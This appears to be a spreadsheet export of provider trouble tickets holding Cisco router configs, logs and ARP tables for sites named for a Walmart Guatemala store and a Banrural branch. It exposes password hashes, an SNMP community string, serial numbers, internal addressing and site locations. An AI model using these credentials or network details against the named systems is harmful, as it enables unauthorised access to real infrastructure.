SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_WALMART_GT_TIENDA_0761
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$PB5T$B03XSVRMPUVMT3BO.J1GI0
!
NO AAA NEW-MODEL
!
!
!
!
!
!
!
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1921/K9 SN FJC2129L2L0
!
!
USERNAME GESTIONIP SECRET 5 $1$TVTU$NI/O.1ALPXBV/4WJJ5CMR1
!
REDUNDANCY
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.152.228 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/344400576T/_/
 BANDWIDTH 3072
 IP ADDRESS 10.72.97.11 255.255.255.240
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.48.3.78 255.255.255.252
 RATE-LIMIT INPUT 3072000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 3072000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF DEAD-INTERVAL 30
 IP OSPF MTU-IGNORE
 DUPLEX AUTO
 SPEED AUTO
!
ROUTER OSPF 1
 ROUTER-ID 10.72.97.11
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 2 SUBNETS
 NETWORK 10.72.97.0 0.0.0.15 AREA 0
 NEIGHBOR 10.72.97.1
!
ROUTER OSPF 2
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 1 METRIC 20 SUBNETS
 NETWORK 22.48.3.76 0.0.0.3 AREA 0
 DEFAULT-INFORMATION ORIGINATE
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.72.97.1
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION LOTE 100 SECTOR B RES AV. PRINCIPAL CENTRO URBANO SAN JOSE LA MAQUINA SUCHITEPEQUEZ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7 021201570C130E
 LOGIN
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_WALMART_GT_TIENDA_0761#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 62 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 62 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 65 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.395: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*FEB 20 00:10:20.127: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*FEB 20 00:10:25.051: %CTS-6-ENV_DATA_START_STATE: ENVIRONMENT DATA DOWNLOAD IN START STATE
*FEB 20 00:10:31.087: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*FEB 20 00:10:31.087: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*FEB 20 00:10:32.087: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*FEB 20 00:10:32.087: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*FEB 20 00:10:36.203: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*FEB 20 00:10:38.715 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*FEB 20 00:10:39.715 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*FEB 20 00:10:40.543 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*FEB 20 00:10:40.543 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*FEB 20 00:10:41.607 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*FEB 20 00:10:41.607 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*FEB 20 00:10:42.719 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.4(3)M3, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 05-JUN-15 12:31 BY PROD_REL_TEAM
*FEB 20 00:10:42.723 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_WALMART_GT_TIENDA_0761 IS UNDERGOING A COLD START
*FEB 20 00:10:44.127 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*FEB 20 00:10:45.127 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*FEB 20 00:11:01.627 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*FEB 20 00:11:13.743 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.97.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*FEB 20 17:02:10.079 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*FEB 20 17:02:11.079 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*FEB 20 17:02:11.079 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*FEB 20 17:04:56.079 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*FEB 20 17:04:57.079 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*FEB 20 17:05:29.379 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*FEB 20 17:31:32.079 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*FEB 20 17:31:33.079 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*FEB 20 17:31:33.079 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*FEB 20 17:34:25.079 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*FEB 20 17:34:26.079 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*FEB 20 17:34:55.379 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*FEB 20 20:32:03.078 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*FEB 20 20:32:04.078 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*FEB 20 20:32:04.078 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*FEB 20 20:35:10.078 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*FEB 20 20:35:11.078 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*FEB 20 20:35:39.506 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAR  3 13:23:20.875 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAR 29 01:09:53.371 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*APR  6 20:44:16.834 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAY  7 21:18:18.366 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAY 11 12:13:07.204 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.97.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 11 12:13:18.904 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.97.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*MAY 11 12:19:36.180 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.97.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*MAY 13 20:20:04.778 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAY 17 18:03:19.207 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAY 19 23:37:29.986 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.97.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 19 23:41:46.398 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.97.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*MAY 24 22:39:54.528 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 24 22:39:55.528 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 24 22:39:55.528 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.97.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*MAY 24 22:40:14.528 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 24 22:40:15.528 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 24 22:40:46.200 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.97.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*MAY 26 09:23:03.392 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.97.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 26 09:42:06.143 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.97.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*JUN  2 22:14:33.891 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*JUN  8 19:39:17.392 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*JUN 17 17:18:59.707 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*JUN 17 19:33:32.666 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*JUN 23 23:16:30.205 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
CC_WALMART_GT_TIENDA_0761#
SHOW CLOCK
*03:13:39.940 UTC FRI JUN 24 2022
CC_WALMART_GT_TIENDA_0761#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.97.1              0   A4BE.2BE5.7F1F  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.97.11             -   00A3.8E70.6B20  ARPA   GIGABITETHERNET0/0
INTERNET  22.48.3.77            119   00A3.8EC8.8140  ARPA   GIGABITETHERNET0/1
INTERNET  22.48.3.78              -   00A3.8E70.6B21  ARPA   GIGABITETHERNET0/1
CC_WALMART_GT_TIENDA_0761#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/344400576T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
CC_WALMART_GT_TIENDA_0761#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.72.97.11     YES NVRAM  UP                    UP
GIGABITETHERNET0/1         22.48.3.78      YES NVRAM  UP                    UP
LOOPBACK5                  10.212.152.228  YES NVRAM  UP                    UP
CC_WALMART_GT_TIENDA_0761#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN WALLMART 10.72.97.11
  PING 10.72.97.11: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.97.11 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/5 MS
RUTA IP:
PE: 10.179.28.33
DISPLAY IP ROUTING-TABLE VPN-INSTANCE WALLMART 10.72.97.11
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALLMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.72.97.11/32  DIRECT  0    0                 0.0.0.0         VLANIF1795			</t>
  </si>
  <si>
    <t>F4614727</t>
  </si>
  <si>
    <t xml:space="preserve">ENLACE FUNCIONANDO CONRRECTAMENTE EL INCONVENIENTE ENCONTRADO ES CAIDA DE ENERGIA COMERCIAL EN EL CLIENTE.
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 10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849 UPTIME IS 10 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 01:27:57 UTC FRI JUN 24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3081KE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3081KE
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0849#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4134 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0849
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
!
NO AAA NEW-MODEL
!
NO IPV6 CEF
!
!
!
!
!
NO IP DOMAIN LOOKUP
IP CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX163081KE
!
!
USERNAME GESTIONIP SECRET 4 J97D2KYDSNA1WFDCO/9OZ72YEJCXHSGT1W6FUL8O/O.
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.120.243 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8901328T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.72.90.135 255.255.255.224
 RATE-LIMIT INPUT 2048000 256000 512000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 256000 512000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN REDUNDANTE/_/8901745T/_/
 BANDWIDTH 512
 IP ADDRESS 10.72.123.20 255.255.255.128
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100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8.49.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.168.49.126 255.255.255.0
 RATE-LIMIT INPUT 512000 64000 128000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 512000 64000 128000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
!
ROUTER OSPF 1
 ROUTER-ID 10.72.90.135
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.72.90.135 0.0.0.0 AREA 164
 NEIGHBOR 10.72.90.129
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.72.123.1 225 NAME REDUNDANCIA_WIMAX
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.168.49.0/24
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.212.120.243/32
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 10.138.49.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KM.75 CARR AL SALVADOR C.C. LA ISLA CUILAPA SANTA ROS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LINE VTY 5 15
 LOGIN
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_BANRURAL_GT_AGENCIA_0849#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 34 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 34 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 38 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
JAN  2 12:00:02.583: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
JUN 24 01:28:13.611: %ESWMRVL_FLTMG-5-NOTICE: NOTICE: FPGA REV 0X71
JUN 24 01:28:18.431: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO RESET
JUN 24 01:28:18.435: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO RESET
JUN 24 01:28:19.419: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
JUN 24 01:28:19.431: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 24 01:28:19.631: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 24 01:28:20.483: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 24 01:28:20.487: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 24 01:28:20.955 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
JUN 24 01:28:21.715 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
JUN 24 01:28:22.687 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 24 01:28:22.751 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
JUN 24 01:28:22.811 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
JUN 24 01:28:22.875 UTC: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 24 01:28:22.875 UTC: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 24 01:28:22.959 UTC: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 24 01:28:23.087 UTC: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO UP
JUN 24 01:28:23.543 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(2)T1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2012 BY CISCO SYSTEMS, INC.
COMPILED WED 29-FEB-12 19:19 BY PROD_REL_TEAM
JUN 24 01:28:23.723 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BANRURAL_GT_AGENCIA_0849 IS UNDERGOING A COLD START
JUN 24 01:28:24.343 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
JUN 24 01:28:24.343 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO DOWN
JUN 24 01:28:24.343 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO DOWN
JUN 24 01:28:24.343 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO DOWN
JUN 24 01:28:24.343 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO UP
JUN 24 01:28:24.347 UTC: %OSPF-4-NSSA_NO_FA: OSPF PROCESS 1 LACKS FORWARDING ADDRESS FOR TYPE 7 LSA 10.212.120.243 IN NSSA 164 - P-BIT CLEARED
JUN 24 01:28:25.531 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 24 01:28:25.543 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 24 01:28:50.779 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.157 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
JUN 24 01:28:54.027 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
JUN 24 01:28:59.223 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.151 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
JUN 24 01:29:05.679 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.212.200.151 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
JUN 24 01:29:09.671 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.156 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
JUN 24 01:29:22.071 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.147 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
CC_BANRURAL_GT_AGENCIA_0849#
SHOW CLOCK
01:38:33.175 UTC FRI JUN 24 2022
CC_BANRURAL_GT_AGENCIA_0849#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.90.129            0   084F.0AC8.669F  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.90.135            -   D48C.B588.7020  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.90.147            9   3458.40C8.0D24  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.90.151           10   3458.40C8.95C7  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.90.153           10   C0FF.A821.E0E9  ARPA   GIGABITETHERNET0/0
